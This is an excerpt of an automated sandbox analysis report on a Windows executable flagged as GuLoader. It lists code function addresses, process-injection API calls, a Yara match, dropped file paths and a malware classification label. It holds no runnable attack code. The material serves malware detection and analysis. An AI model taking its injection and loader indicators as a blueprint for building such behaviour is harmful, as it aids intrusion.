      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D790C125_2_1D790C12
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D86ACEB5_2_1D86ACEB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BFCE05_2_1D7BFCE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81EC205_2_1D81EC20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B8CDF5_2_1D7B8CDF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84EC4C5_2_1D84EC4C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85EC605_2_1D85EC60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D856C695_2_1D856C69
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85EFBF5_2_1D85EFBF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D851FC65_2_1D851FC6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ACF005_2_1D7ACF00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE05_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81FF405_2_1D81FF40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85FF635_2_1D85FF63
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D850EAD5_2_1D850EAD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C0E505_2_1D7C0E50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D859ED25_2_1D859ED2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D792EE85_2_1D792EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB25_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85E9A65_2_1D85E9A6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7E59C05_2_1D7E59C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79E9A05_2_1D79E9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A98705_2_1D7A9870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BB8705_2_1D7BB870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7868685_2_1D786868
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8198B25_2_1D8198B2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8518DA5_2_1D8518DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CE8105_2_1D7CE810
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8578F35_2_1D8578F3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A38005_2_1D7A3800
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8408355_2_1D840835
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A28C05_2_1D7A28C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8158705_2_1D815870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85F8725_2_1D85F872
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B68825_2_1D7B6882
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D814BC05_2_1D814BC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7DDB195_2_1D7DDB19
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0B105_2_1D7A0B10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85FB2E5_2_1D85FB2E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85FA895_2_1D85FA89
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85CA135_2_1D85CA13
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BFAA05_2_1D7BFAA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85EA5B5_2_1D85EA5B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8575C65_2_1D8575C6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85F5C95_2_1D85F5C9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D86A5265_2_1D86A526
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80D4805_2_1D80D480
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A04455_2_1D7A0445
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A27605_2_1D7A2760
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7AA7605_2_1D7AA760
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8567575_2_1D856757
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C46705_2_1D7C4670
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85A6C05_2_1D85A6C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8136EC5_2_1D8136EC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85F6F65_2_1D85F6F6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BC6005_2_1D7BC600
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79C6E05_2_1D79C6E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83D62C5_2_1D83D62C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84D6465_2_1D84D646
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A06805_2_1D7A0680
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7E717A5_2_1D7E717A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78F1135_2_1D78F113
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D86010E5_2_1D86010E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BB1E05_2_1D7BB1E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83D1305_2_1D83D130
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A51C05_2_1D7A51C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8570F15_2_1D8570F1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7AB0D05_2_1D7AB0D0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7900A05_2_1D7900A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D508C5_2_1D7D508C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84E0765_2_1D84E076
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7AE3105_2_1D7AE310
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85F3305_2_1D85F330
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7913805_2_1D791380
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78D2EC5_2_1D78D2EC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85124C5_2_1D85124C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_016806CD5_2_016806CD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: String function: 1D7D5050 appears 36 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: String function: 1D81EF10 appears 105 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: String function: 1D7E7BE4 appears 97 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: String function: 1D78B910 appears 272 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: String function: 1D80E692 appears 86 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03330A7D NtWriteVirtualMemory,1_2_03330A7D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03343960 NtProtectVirtualMemory,1_2_03343960
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_033449A1 NtResumeThread,1_2_033449A1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_1D7D2D10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_1D7D2B10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_1D7D2B90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2D50 NtWriteVirtualMemory,5_2_1D7D2D50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2DC0 NtAdjustPrivilegesToken,5_2_1D7D2DC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2DA0 NtReadVirtualMemory,5_2_1D7D2DA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2C50 NtUnmapViewOfSection,5_2_1D7D2C50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D3C30 NtOpenProcessToken,5_2_1D7D3C30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2C30 NtMapViewOfSection,5_2_1D7D2C30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2C20 NtSetInformationFile,5_2_1D7D2C20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2C10 NtOpenProcess,5_2_1D7D2C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2CF0 NtDelayExecution,5_2_1D7D2CF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2CD0 NtEnumerateKey,5_2_1D7D2CD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D3C90 NtOpenThread,5_2_1D7D3C90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2F30 NtOpenDirectoryObject,5_2_1D7D2F30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2F00 NtCreateFile,5_2_1D7D2F00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2FB0 NtSetValueKey,5_2_1D7D2FB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2E50 NtCreateSection,5_2_1D7D2E50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2E00 NtQueueApcThread,5_2_1D7D2E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2ED0 NtResumeThread,5_2_1D7D2ED0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2EC0 NtQuerySection,5_2_1D7D2EC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2EB0 NtProtectVirtualMemory,5_2_1D7D2EB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2E80 NtCreateProcessEx,5_2_1D7D2E80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D29F0 NtReadFile,5_2_1D7D29F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D29D0 NtWaitForSingleObject,5_2_1D7D29D0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D38D0 NtGetContextThread,5_2_1D7D38D0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2B20 NtQueryInformationProcess,5_2_1D7D2B20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2B00 NtQueryValueKey,5_2_1D7D2B00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2BE0 NtQueryVirtualMemory,5_2_1D7D2BE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2BC0 NtQueryInformationToken,5_2_1D7D2BC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2B80 NtCreateKey,5_2_1D7D2B80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2A10 NtWriteFile,5_2_1D7D2A10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2AC0 NtEnumerateValueKey,5_2_1D7D2AC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2AA0 NtQueryInformationFile,5_2_1D7D2AA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D2A80 NtClose,5_2_1D7D2A80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D4570 NtSuspendThread,5_2_1D7D4570
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D34E0 NtCreateMutant,5_2_1D7D34E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D4260 NtSetContextThread,5_2_1D7D4260
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000003.39649421768.000000001D530000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000003.39654608535.000000001D6E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44196722142.000000001DA30000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeSection loaded: edgegdi.dllJump to behavior
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeStatic PE information: invalid certificate
      Source: libgiognutls.dll.1.drStatic PE information: Number of sections : 11 > 10
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeVirustotal: Detection: 29%
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeReversingLabs: Detection: 19%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeJump to behavior
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040344A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Local\Temp\nsp5029.tmpJump to behavior
      Source: classification engineClassification label: mal60.troj.evad.winEXE@3/4@1/1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_00402104 CoCreateInstance,1_2_00402104
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404771
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000001.39482313722.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000003.39652897969.000000001D5B7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000003.39647697379.000000001D40D000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000003.39652897969.000000001D5B7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000003.39647697379.000000001D40D000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000001.39482313722.0000000000649000.00000008.00000001.01000000.00000005.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.39479578905.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332733D push ds; retf 1_2_0332746E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03325773 pushad ; ret 1_2_03325877
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03331367 pushad ; iretd 1_2_03331373
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03325742 push ebp; iretd 1_2_03325771
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_033273D0 push ds; retf 1_2_0332746E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332F3CB pushad ; iretd 1_2_0332F3F4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332B629 push FFFFFFACh; retf 1_2_0332B6DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03330606 push esp; ret 1_2_03330607
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03327D33 push 8566BBEBh; ret 1_2_03327D38
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332B571 push FFFFFFACh; retf 1_2_0332B6DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03325863 pushad ; ret 1_2_03325877
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03330C84 push ds; iretd 1_2_03330C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332B4F0 push FFFFFFACh; retf 1_2_0332B6DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332F4EA push esp; iretd 1_2_0332F4EB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7908CD push ecx; mov dword ptr [esp], ecx5_2_1D7908D6
      Source: libgiognutls.dll.1.drStatic PE information: section name: .xdata
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dllJump to dropped file
